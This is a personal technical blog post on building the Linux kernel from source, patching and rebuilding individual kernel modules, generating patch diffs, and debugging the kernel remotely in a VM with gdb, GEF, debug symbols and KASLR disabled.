<p>Maybe my Google-fu wasn&rsquo;t on point, but it wasn&rsquo;t immediately clear what the best approach was, so hopefully this post can provide some direction for anyone interested in quickly patching, or instrumenting, Linux kernel modules.</p>
<p>Now, if we&rsquo;re talking about patching and instrumentation in the Linux kernel, I&rsquo;d be remiss not to at least touch on some debugging basics as well, right? So hopefully between those three topics we should be able to cover some good ground in this post!</p>
<p>❗</p>
<p>This post ended up being quite long, so if you like a narrative and hearing the why behind the how, please continue! But for brevity I&rsquo;ve also included the essentials my repo over at <a href="https://github.com/sam4k/linux-kernel-resources">sam4k/linux-kernel-resources</a>.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#preamble">Preamble</a>
<ul>
<li><a href="#kernel-module">Kernel Module?</a></li>
</ul>
</li>
<li><a href="#getting-setup">Getting Setup</a>
<ul>
<li><a href="#building-the-kernel">Building The Kernel</a></li>
<li><a href="#module-patching">Module Patching</a></li>
<li><a href="#shortcuts-alternatives">Shortcuts &amp; Alternatives</a>
<ul>
<li><a href="#minimal-configs">Minimal Configs</a></li>
<li><a href="#skip-building-altogether">Skip Building Altogether</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#getting-stuck-in">Getting Stuck In</a>
<ul>
<li><a href="#patch-diffs">Patch Diffs</a></li>
<li><a href="#instrumentation">Instrumentation</a></li>
<li><a href="#debugging">Debugging</a>
<ul>
<li><a href="#gdb-debugging-stub">GDB Debugging Stub</a></li>
<li><a href="#vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</a></li>
<li><a href="#loadable-modules">Loadable Modules</a></li>
<li><a href="#misc-gdb-tips">Misc GDB Tips</a></li>
<li><a href="#other-stuff">Other Stuff</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#faq">FAQ</a></li>
<li><a href="#postamble">Postamble</a></li>
</ul>
<h2 id="preamble">Preamble</h2>
<p>This post is written in the context of kernel security research, which might deviate from other use cases, so bear that in mind when reading this post.</p>
<p>When finding a vuln, or looking into an existing bug, I&rsquo;ll want to set up a representative environment to play around with it. This basically just means setting up an Ubuntu VM (representative of a typical in-the-wild box) with a vulnerable kernel version.</p>
<p>The only real hard requirement I assume, is that you&rsquo;re doing your kernel stuff in a VM; as this&rsquo;ll make debugging the kernel a lot easier down the line.</p>
<h3 id="kernel-module">Kernel Module?</h3>
<p>In the early, early days (&lt;1995) the Linux kernel was truly monolthic. Any functionality needed to be built into the base kernel at build time and that was that.</p>
<p>Since then, Loadable Kernel Modules (LKMs) have improved the flexibility of the Linux kernel, allowing features to be implemented as modules which can either be built into the base kernel or built as separate, loadable modules.</p>
<p>These can be loaded into, and unloaded from, kernel memory on demand without requiring a reboot or having to rebuild the kernel. Nowadays LKMs are used for device drivers, filesystem drivers, network drivers etc.</p>
<p><img src="https://sam4k.com/content/images/2022/03/ready_to_roll.gif" alt=""></p>
<hr>
<ol>
<li><a href="https://tldp.org/HOWTO/Module-HOWTO/x73.html">The Linux Documentation Project: Introduction to Linux Loadable Kernel Modules</a></li>
<li><a href="https://wiki.archlinux.org/title/Kernel_module">ArchWiki: Kernel Module</a></li>
</ol>
<h2 id="getting-setup">Getting Setup</h2>
<p>Alright, let&rsquo;s get things setup shall we? In this section I&rsquo;ll talk about how to get to a position where we&rsquo;re able to make changes to a kernel module, rebuild it and install it.</p>
<p>There are probably a lot of different ways to do this - some quicker, some hackier and some context specific. While I&rsquo;ll touch on some shortcuts in the next section, in my experience the easiest way to avoid a headache is just starting from a fresh kernel build.</p>
<p>So that&rsquo;s what we&rsquo;re going to do! Buckle up, let&rsquo;s see if I can keep this brief. First I&rsquo;ll quickly cover how to build the kernel and then move onto patching specific modules.</p>
<h3 id="building-the-kernel">Building The Kernel</h3>
<p>First things first, make sure you grab the necessary dependencies for building the kernel:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves
</span></span></code></pre></div><p>With that sorted, <strong>download</strong> the kernel version you&rsquo;re wanting to play with from <a href="https://kernel.org">kernel.org</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.17.tar.xz
</span></span></code></pre></div><p>If you&rsquo;re not sure what kernel version to go for, just pick one closest to your current environment, which you can check via the cmd <code>uname -r</code>; don&rsquo;t worry about patch versions or anything past the first two number, we ain&rsquo;t got no time for that.</p>
<p>Next let&rsquo;s <strong>extract</strong> the kernel source into our current dir and <code>cd</code> into it after:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ tar -xf linux-5.17.tar.xz <span class="o">&amp;&amp;</span> <span class="nb">cd</span> linux-5-17
</span></span></code></pre></div><p>Now we need to <strong>configure</strong> our kernel. The kernel configuration is stored in a file named <code>.config</code>, in the root of the kernel source tree (aka where we just <code>cd</code>&rsquo;d into).</p>
<p>On Debian-based distros you should be able to find your config at <code>/boot/config-$(uname -r)</code> or similar; on my Arch box it&rsquo;s compressed at <code>/proc/config.gz</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ cp /boot/config-<span class="k">$(</span>uname -r<span class="k">)</span> .config
</span></span></code></pre></div><p>This file contains all the configuration options for your kernel; if you want to play around with these you can use <code>make menuconfig</code> to tweak your config. Speaking of <strong>tweaking your config</strong>, you may want to make some changes:</p>
<ul>
<li>On Ubuntu, you&rsquo;ll likely encounter some key related issues if you try to build using their config, so set the following config values in your <code>.config</code>: <code>CONFIG_SYSTEM_TRUSTED_KEYS=&quot;&quot;</code>, <code>CONFIG_SYSTEM_REVOCATION_KEYS=&quot;&quot;</code></li>
<li>Given there may be patching and debugging involved down the line, it might be worth taking the opportunity to enable debugging symbols with <code>[CONFIG_DEBUG_INFO](https://cateee.net/lkddb/web-lkddb/DEBUG_INFO.html)=Y</code>  &amp;&amp; <code>[CONFIG_GDB_SCRIPTS](https://cateee.net/lkddb/web-lkddb/GDB_SCRIPTS.html)=Y</code> ; you can enable this easily by using the helper <code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code></li>
</ul>
<p>With <code>.config</code> ready, let&rsquo;s crack on. By using <code>oldconfig</code> instead of <code>menuconfig</code> we can avoid the ncurses interface and just update the kernel configuration using our <code>.config</code> (it just means we may get some prompts during the make process for new options):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ make oldconfig
</span></span></code></pre></div><p>Now we&rsquo;re ready to start <strong>building</strong> the kernel, and depending on your system and the <code>.config</code> we&rsquo;ve copied over, this can <em>take a while</em>, so fire all CPU cores:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ make -j<span class="k">$(</span>nproc<span class="k">)</span>
</span></span></code></pre></div><p>Next up, we can start installing our freshly built kernel. First up are the modules, which will typically be installed to <code>/lib/modules/&lt;kernel_vers&gt;</code>. So, to install our modules we&rsquo;ll go ahead and run:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ sudo make modules_install
</span></span></code></pre></div><p>Finally we&rsquo;ll install the kernel itself; the follow command will do all the housekeeping required to let us select the new kernel from our bootloader:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ sudo make install 
</span></span></code></pre></div><p><img src="https://sam4k.com/content/images/2022/03/mission_accomplished.gif" alt=""></p>
<p>And voila! Just like that we&rsquo;ve built our Linux kernel from source, nabbing the config from our current environment, and we&rsquo;re ready to do some tinkering!</p>
<h3 id="module-patching">Module Patching</h3>
<p>Okay, now we have a clean environment to work with and can start tinkering! Because we&rsquo;ve built the kernel from source, we know we&rsquo;re building our patched modules in the exact same development environment as the kernel we&rsquo;re installing them into.</p>
<p>While the initial build can be lengthy, it&rsquo;s straightforward and we avoid the headache of out-of-tree module taints, signing issues and other finicky version-mismatch related issues.</p>
<p>Instead, we can make whatever changes we intend to make to our module and then run much the same commands we did during the initial install, only targeting our patched module(s). For example, for CVE-2022-0435 I tested a patches in <code>net/tipc/monitor.c</code>, so to rebuild and install my patched module I&rsquo;d simply run:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ make M=net/tipc
</span></span><span class="line"><span class="cl">$ sudo make M=net/tipc modules_install
</span></span></code></pre></div><p>I&rsquo;m then able to go ahead and re/load <code>tipc</code> and we&rsquo;re good to go! Easy as that.</p>
<h3 id="shortcuts-alternatives">Shortcuts &amp; Alternatives</h3>
<p>As some of you may already be painfully aware, building a full-featured kernel can actually take some time, especially in a VM with limited resources.</p>
<h4 id="minimal-configs">Minimal Configs</h4>
<p>So to speed things up dramatically, if you&rsquo;re familiar with the module(s) you&rsquo;re going to be looking at, a more efficient approach is to start from a minimal config and enable the bare minimum features required for your testing environment.</p>
<p>For example <code>$ make defconfig</code> will generate a minimal default config for your arch, and then you can use <code>$ make menuconfig</code> to make further adjustments.</p>
<h4 id="skip-building-altogether">Skip Building Altogether</h4>
<p>Depending on your requirements, you can just avoid building altogether:</p>
<ul>
<li>if you just want to do some debugging, you could pull debug symbols from your distribution repo (see section on symbols below)</li>
<li>you may be able to fetch source from your distro repos, where you can then patch and build modules from there</li>
<li>if you don&rsquo;t need to worry about module signing/taint, and you&rsquo;re happy to get messy, there&rsquo;s hackier ways to do all this too</li>
</ul>
<h2 id="getting-stuck-in">Getting Stuck In</h2>
<p><img src="https://sam4k.com/content/images/2022/03/fun_begins.gif" alt=""></p>
<p>Now that we&rsquo;ve got our kernel dev environment setup, it&rsquo;s time to get stuck in! I&rsquo;ll briefly touch on generating patches, because why not, and instrumentation (though I&rsquo;m not as familiar with this topic) before finally covering how we can debug kernel modules.</p>
<h3 id="patch-diffs">Patch Diffs</h3>
<p>Disclaimer, if you want to submit any patches to the kernel formally, then definitely check out this <em><strong>comprehensive</strong></em> kernel doc on the various dos &amp; donts of <a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">submitting patches</a>.</p>
<p>That said, we&rsquo;re just playing around here! Plus I don&rsquo;t think it actually mentions the command in that particular doc. Anyway, I digress, we can run the following commands to generate a simple patch diff between two files:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ diff -u monitor.c monitor_patched.c 
</span></span><span class="line"><span class="cl">--- monitor.c   2021-03-11 13:19:18.000000000 +0000
</span></span><span class="line"><span class="cl">+++ monitor_patched.c 2022-04-06 19:25:27.449661568 +0100
</span></span><span class="line"><span class="cl">@@ -503,8 +503,10 @@
</span></span><span class="line"><span class="cl">        /* Cache current domain record <span class="k">for</span> later use */
</span></span><span class="line"><span class="cl">        dom_bef.member_cnt <span class="o">=</span> 0<span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">dom</span> <span class="o">=</span> peer-&gt;domain<span class="p">;</span>
</span></span><span class="line"><span class="cl">-       <span class="k">if</span> <span class="o">(</span>dom<span class="o">)</span>
</span></span><span class="line"><span class="cl">+       <span class="k">if</span> <span class="o">(</span>dom<span class="o">)</span> <span class="o">{</span>
</span></span><span class="line"><span class="cl">+               printk<span class="o">(</span><span class="s2">&#34;printk debugging ftw!\n&#34;</span><span class="o">)</span>
</span></span><span class="line"><span class="cl">                memcpy<span class="o">(</span><span class="p">&amp;</span>dom_bef, dom, dom-&gt;len<span class="o">)</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">+       <span class="o">}</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">        /* Transform and store received domain record */
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="o">(</span>!dom <span class="o">||</span> <span class="o">(</span>dom-&gt;len &lt; new_dlen<span class="o">))</span> <span class="o">{</span>
</span></span></code></pre></div><p>Where <code>-u</code> tells <code>diff</code> to use the unified format, which provides us with 3 lines of unified context (this is the standard, but N lines of context can be specified with <code>-u N</code>).</p>
<p>This unified format provides a line-by-line comparison of the given files, letting us know what&rsquo;s changed from one to another:</p>
<ol>
<li>Line 2 is part of the patch header, prefixed with <code>---</code>, and tells us the original file, date created and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li>
<li>Line 3 is also part of the header, prefixed with <code>+++</code>, and tells us the new file, date created and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li>
<li>Line 4, encapsulated by <code>@@</code>, defines the start of &ldquo;hunk&rdquo; (group) of changes in our diff; sticking to <code>-</code> for original and <code>+</code> for new, <code>-503,8</code> tells us this hunk is starting from line 503 in <code>monitor.c</code> and shows 8 lines. <code>+503,10</code> means the hunk also starts from line 503 in <code>monitor_patched.c</code> but shows 10 lines (which checks out as we removed 1 and added 3).</li>
<li>Lines 5-7 &amp; 13-15 are our 3 lines of unified context, just to give us some idea of what&rsquo;s going on around the lines we&rsquo;ve changed</li>
<li>Lines 8-12 then are, by process of elimination, the lines we&rsquo;ve changed. Changing things up, now <code>-</code> prefixes lines we&rsquo;ve removed (i.e in <code>monitor.c</code> but no longer in <code>monitor_patched.c</code>) and <code>+</code> prefixes lined we&rsquo;ve added to <code>monitor_patched.c</code></li>
</ol>
<p>So there&rsquo;s a quick ramble on patch diffs. It&rsquo;s as easy as that. We can also do diffs on entire directly/globs of files:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ diff -Naur net/tipc/ net/tipc_patched/
</span></span></code></pre></div><p>Where <code>-N</code> treats missing files as empty, <code>-a</code> treats all files as text, <code>-r</code> recursively compares subdirs and <code>-u</code> is the same as before.</p>
<p>If we want to save these patches and apply them down the line, we can redirect the output into a file and then apply it to the original:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ diff -u monitor.c monitor_patched.c &gt; monitor.patch
</span></span><span class="line"><span class="cl">$ patch -p0 &lt; monitor.patch 
</span></span><span class="line"><span class="cl">patching file monitor.c
</span></span></code></pre></div><p>When we pass <code>patch</code> a patch file, it expects and argument <code>-pX</code> where <code>X</code> defines how many directory levels to strip from our patch header. Our was like <code>--- monitor.c</code>, so we include <code>-p0</code> as there&rsquo;s 0 dir levels to strip!</p>
<h3 id="instrumentation">Instrumentation</h3>
<p><img src="https://sam4k.com/content/images/2022/03/printk-1.gif" alt=""></p>
<p>Memes aside, <code>printf()</code> does the job in your own C projects, <code>printk()</code> is just the kernel-land equivalent[1] and sometime&rsquo;s a cheeky <code>printk(&quot;here&quot;)</code> is all you need.</p>
<p>Using the patching approach we mentioned above, sometimes the easiest way to debug or trace execution isn&rsquo;t to set up some complication framework but simply to sprinkle in some <code>printk()</code>&rsquo;s and rebuild your module and voila!</p>
<p>And well, that&rsquo;s the extent of my practical kernel instrumentation knowledge. But I&rsquo;d feel bad making a whole section just to meme <code>printk()</code>, so while I can&rsquo;t expand on them fully, here are a couple of other avenues for kernel instrumentation:</p>
<h4 id="kprobes">kprobes</h4>
<blockquote>
<p>kprobes enable you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit — <a href="https://www.kernel.org/doc/html/latest/trace/kprobes.html">kernel.org/doc</a></p>
</blockquote>
<p>kprobes provide a fairly comprehensive API for your instrumentation needs, however the flip side is that is does require some light kernel development skills (perhaps a good intro task to kernel development??) to get stuck in.</p>
<h4 id="ftrace">ftrace</h4>
<p>ftrace, or function tracer, is &ldquo;an internal tracer designed to help out developers and designers of systems to find what is going on inside the kernel [&hellip;] although ftrace is typically considered the function tracer, it is really a frame work of several assorted tracing utilities.&rdquo; <a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">[2]</a>.</p>
<p>ftrace is actually quite interesting, as unlike similarly named (but not to be confused) tools like <code>strace</code>, there is no usermode binary to interact with the kernel component. Instead, users interact with the tracefs file system.</p>
<p>For the sake of brevity, if you&rsquo;re interested in checking out ftrace, here is an introductory guide by Gaurav Kamathe on opensource.com:</p>
<p><a href="https://opensource.com/article/21/7/linux-kernel-ftrace">Analyze the Linux kernel with ftrace</a></p>
<h4 id="ebpf">eBPF??</h4>
<p>Okay, this might be a bit of a rogue one. Quick disclaimer being I&rsquo;ve unfortunately not found the time, despite it being high up on my list, to properly play with eBPF. So touch any statements RE eBPF features with a pinch of salt!</p>
<p><img src="https://sam4k.com/content/images/2022/04/idkanything.gif" alt=""></p>
<p>That said, to summarise (I think I got this bit right), eBPF is a kernel feature introduced in 4.x that allows privileged usermode applications to run sandboxed code in the kernel.</p>
<p>I&rsquo;m particularly interested in seeing the limits of its application, particularly in spaces such as detection, rootkits and debugging; for something original focused around networking.</p>
<p>Although, RE instrumentation &amp; debugging, I&rsquo;m not sure how much extra mileage eBPF would be able to provide. The eBPF bytecode runs in a sandboxed environment within the kernel, and as far as I&rsquo;m aware can&rsquo;t alter kernel data.</p>
<p>That said, from a instrumentation perspective we can still do some interesting tracing. For example, we can attach to one of our kprobes and read function args &amp; ret values.</p>
<p>Anyway, perhaps just some food-for-thought, but I&rsquo;ll stop rambling! I&rsquo;ll drop a couple of links below to existing publications on eBPF instrumentation/debugging [3].</p>
<hr>
<ol>
<li>The reason it&rsquo;s <code>printk()</code>, and not the classic <code>printf()</code> we usually find in C, as the C standard library isn&rsquo;t available in kernel mode; so the <code>k</code> in <code>printk()</code> let&rsquo;s us know we&rsquo;re using the kernel-land implementation.</li>
<li><a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">https://www.kernel.org/doc/Documentation/trace/ftrace.txt</a></li>
<li><a href="https://www.usenix.org/sites/default/files/conference/protected-files/lisa18_slides_babrou.pdf">Debugging Linux issues with eBPF</a> (USENIX LISA18)  </li>
<li><a href="https://elinux.org/images/d/dc/Kernel-Analysis-Using-eBPF-Daniel-Thompson-Linaro.pdf">Kernel analysis using eBPF</a></li>
</ol>
<h3 id="debugging">Debugging</h3>
<p><img src="https://sam4k.com/content/images/2022/04/noidea.gif" alt=""></p>
<p>Working with something as complex as the Linux kernel, you&rsquo;ll inevitably find yourself resonating with the above gif, and that&rsquo;s alright! That said, getting a smooth debugging workflow setup can go a long ways to alleviating the confusion.</p>
<p>Setting up good debugging environment means you can set breakpoints, allowing you to pause kernel execution at moments of interest, as well as inspect, and even change, registers and memory! There&rsquo;s also scope for scripting various elements of this process too.</p>
<h4 id="gdb-debugging-stub">GDB Debugging Stub</h4>
<p>Remember about 2000 words ago I mentioned the only real assumption I was going to make is that you&rsquo;re doing your kernel testing/shenanigans in a VM?</p>
<p>It turns out that trying to debug the kernel you&rsquo;re running is&hellip; tricky. So besides snapshots and various other QoL features, a big pro to using VMs is the ability to remotely debug them at the kernel-level from our host (or another guest) using a debugger<a href="https://www.sourceware.org/gdb/">[1]</a>.</p>
<p>The debugger in question, gdb, or the GNU Project debugger<a href="https://www.sourceware.org/gdb/">[1]</a>, is a portable debugger that runs on many UNIX-like systems and is basically the defacto Linux kernel debugger (@ me).</p>
<p>Thanks to gdbstubs<a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">[2]</a>, sets of files included by the virtualisation software (VMWare, QEMU etc.) in guests, we&rsquo;re able to remotely debug our guest kernel with much the same functionality we&rsquo;d expect from userland debugging: breakpoints, viewing/setting registers and memory etc. etc.[3]</p>
<p>I&rsquo;ll use this opportunity to plug <a href="https://gef.readthedocs.io/en/master/">GEF</a> (GDB Enhanced Features) cos let&rsquo;s not forget gdb is like 36 years old and your boy needs some colours up in his CLI. Beyond just colours, gef has a great suite of quality-of-life features that just make the debugging workflow easier.</p>
<p>❗</p>
<p>Note that future GDB snippets will be using GEF, definitely not in an attempt to convert you, so don&rsquo;t be scared by the `gef➤` prompt; it&rsquo;s all the same program.</p>
<p>Anyway, enough rambling, let&rsquo;s take a look at getting kernel debugging setup on our VM:</p>
<ol>
<li><strong>Enable the gdbstub on your guest</strong><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">[4]</a>; typically this will listen on an interface:port you specify on the host. E.g. QEMU by default listens on <code>localhost:1234</code>.</li>
<li>Now on your host, or another guest that can reach the listening interface on your host, you can spin up and gdb[5] and connect:</li>
</ol>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ gdb
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">gef➤ target remote :1234 
</span></span><span class="line"><span class="cl">gef➤ <span class="c1"># you can omit localhost, so just :1234 works too</span>
</span></span></code></pre></div><p>And just like that, you&rsquo;re now remotely debugging the Linux kernel - awesome, right? Except if you&rsquo;ve just fired up gdb and connected like the snippet above, you&rsquo;re probably seeing something like this:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gef➤  target remote :12345
</span></span><span class="line"><span class="cl">Remote debugging using :12345
</span></span><span class="line"><span class="cl">warning: No executable has been specified and target does not support
</span></span><span class="line"><span class="cl">determining executable automatically.  Try using the &#34;file&#34; command.
</span></span><span class="line"><span class="cl">0xffffffffa703f9fe in ?? ()
</span></span><span class="line"><span class="cl">[ Legend: Modified register | Code | Heap | Stack | String ]
</span></span><span class="line"><span class="cl">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
</span></span><span class="line"><span class="cl">[!] Command &#39;context&#39; failed to execute properly, reason: &#39;NoneType&#39; object has no attribute &#39;all_registers&#39;
</span></span><span class="line"><span class="cl">gef➤  info reg
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">rip            0xffffffffa703f9fe  0xffffffffa703f9fe
</span></span></code></pre></div><p>Huh, so we&rsquo;ve connected and it looks like we&rsquo;ve trapped execution at <code>0xffffffffa703f9fe</code>, but gdb has no idea where we are&hellip; This does not bode well for a productive debugging session; so let&rsquo;s look at how to fix that!</p>
<h4 id="vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</h4>
<p>So although our gdb has managed to make contact with the gdbstub on our guest, it&rsquo;s far from omnipotent. It can interact with memory and read the registers, as it understands the architecture, however it doesn&rsquo;t know about the kernel&rsquo;s functions and data structures.</p>
<p>Unfortunately for us that&rsquo;s the whole reason we&rsquo;re doing kernel debugging, to debug the kernel! Luckily though, it&rsquo;s fairly simple to tell gdb everything it needs to know.</p>
<p>If you&rsquo;ve you&rsquo;ve read my <a href="https://sam4k.com/linternals-the-modern-boot-process-part-2/">Linternals: The (Modern) Boot Process [0x02]</a>, you&rsquo;ll know that there&rsquo;s file called <code>vmlinux</code> containing the decompressed kernel image as a statically linked ELF. Just like debugging a userland binary, we can load this <code>vmlinux</code> into gdb and it&rsquo;s able to interpret it without any dramas.</p>
<p>Importantly, though, just like userland debugging we want to make sure we load a <code>vmlinux</code> with debugging symbols included, there&rsquo;s a couple options for this:</p>
<ul>
<li>If you&rsquo;re building from source, just include <code>CONFIG_DEBUG_INFO=y</code> and optionally <code>CONFIG_GDB_SCRIPTS=y</code> and you&rsquo;ll find your vmlinux with debug symbols in your build root (see <a href="compiling/README.md">compiling/README.md</a> for more info on building)
<ul>
<li><code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code> will enable these in your config with minimal fiddling</li>
</ul>
</li>
<li>If you&rsquo;re running a distro kernel, you can check your distro&rsquo;s repositories to see if you can pull debug symbols
<ul>
<li>On Ubuntu, if you update your sources and keyring <a href="https://wiki.ubuntu.com/Debug%20Symbol%20Packages">[1]</a>, you can pull the debug symbols by running <code>$ sudo apt-get install linux-image-$(uname -r)-dbgsym</code> and should find your <code>vmlinux</code> @ <code>/usr/lib/debug/boot/vmlinux-$(uname-r)</code></li>
</ul>
</li>
</ul>
<p>And just like that, we&rsquo;re done! jk, there&rsquo;s one more common gotcha (that I always forget) and that&rsquo;s KASLR: Kernel Address Space Layout Randomization. As it sounds, this randomizes where the kernel image is loaded into memory at boot time; so the address gdb reads from the vmlinux will naturally be wrong&hellip;</p>
<ul>
<li>You can either add <code>nokaslr</code> to your boot options, typically via grub menu at boot</li>
<li>Or by editing <code>/etc/default/grub</code> and including <code>nokaslr</code> in <code>GRUB_CMDLINE_LINUX_DEFAULT</code></li>
</ul>
<p>After that we really are ready, and can repeat the steps from before, remember to also load our <code>vmlinux</code> with gdb:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ gdb vmlinux
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">gef➤  target remote :12345 
</span></span><span class="line"><span class="cl">... 
</span></span><span class="line"><span class="cl">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#0] Id 1, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#1] Id 2, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#2] Id 3, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#3] Id 4, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP</span>
</span></span><span class="line"><span class="cl">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#0] 0xffffffff81c3f9fe → native_safe_halt()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#1] 0xffffffff81c3fc4d → arch_safe_halt()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#2] 0xffffffff81c3fc4d → acpi_safe_halt()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#3] 0xffffffff81c3fc4d → acpi_idle_do_entry(cx=0xffff88810187d864)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#4] 0xffffffff816e4201 → acpi_idle_enter(dev=&lt;optimized out&gt;, drv=&lt;optimized out&gt;, index=&lt;optimized out&gt;)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#5] 0xffffffff8198e56d → cpuidle_enter_state(dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, index=0x1)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#6] 0xffffffff8198e88e → cpuidle_enter(drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, dev=0xffff888105a61c00, index=0x1)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#7] 0xffffffff810e7fa2 → call_cpuidle(next_state=0x1, dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;)</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#8] 0xffffffff810e7fa2 → cpuidle_idle_call()</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span><span class="c1">#9] 0xffffffff810e80c3 → do_idle()</span>
</span></span><span class="line"><span class="cl">───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
</span></span><span class="line"><span class="cl">gef➤  
</span></span></code></pre></div><p>Awesome! Now gdb knows exactly where we our, and gef provides us lots of useful information in it&rsquo;s <code>ctx</code> menu, which you can always pop up with the <code>ctx</code> command.</p>
<p>I&rsquo;ve cut it off for brevity but we can at a glance see sections (might need to scroll right for the headings) for registers, stack, code, threads and trace!</p>
<p>On top of that, as I&rsquo;ll touch on in <strong>Misc GDB Tips</strong> below, we&rsquo;re able to explore all the kernel structures and more thanks to the symbols we now have.</p>
<h4 id="loadable-modules">Loadable Modules</h4>
<p>As a quick aside, you might find out that some symbols for certain modules are missing, despite doing all that <code>vmlinux</code> faff above. This is because not all modules are compiled into the kernel, some are compiled as loadable modules.</p>
<p>This means that the modules are only loaded into memory when they&rsquo;re needed, e.g. via <code>modprobe</code>. We can check if a module is loaded in our <code>.config</code>:</p>
<ul>
<li><code>CONFIG_YOUR_MODULE=y</code> defines an in-kernel module</li>
<li><code>CONFIG_YOUR_MODULE=m</code> defines a loadable kernel module</li>
</ul>
<p>For loadable modules, we need to do a couple of extra steps, <strong>in addition to those above</strong>, in order to let gdb know about these symbols:</p>
<ul>
<li>Copy the module&rsquo;s <code>your_module.ko</code> from your debugging target; try <code>/lib/modules/$(uname -r)/kernel/</code></li>
<li>On your debugging target, find out the base address of the module; try <code>sudo grep -e &quot;^your_module&quot; /proc/modules</code></li>
<li>In your gdb session, you can now load in the module by <code>(gdb) add-symbol-file your_module.ko 0xAddressFromProc</code> - voila!</li>
</ul>
<p>Sorted! Now the symbols from <code>your_module</code> should be available in gdb! Just remember that even with KASLR disabled, this address can be different each time you load the module, but you only need to grab the <code>your_module.ko</code>  once at least.</p>
<h4 id="misc-gdb-tips">Misc GDB Tips</h4>
<p><img src="https://sam4k.com/content/images/2022/04/whathaveidone.gif" alt=""></p>
<p>Oof, well this post is already careening towards 4000 words (and I did this voluntarily, for fun?!), so I think I&rsquo;ll just link to my repository where you can find some useful gdb/gef commands for debugging the Linux kernel!</p>
<p><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#useful-gdb-commands">linux-kernel-resources/debugging at main · sam4k/linux-kernel-resources</a></p>
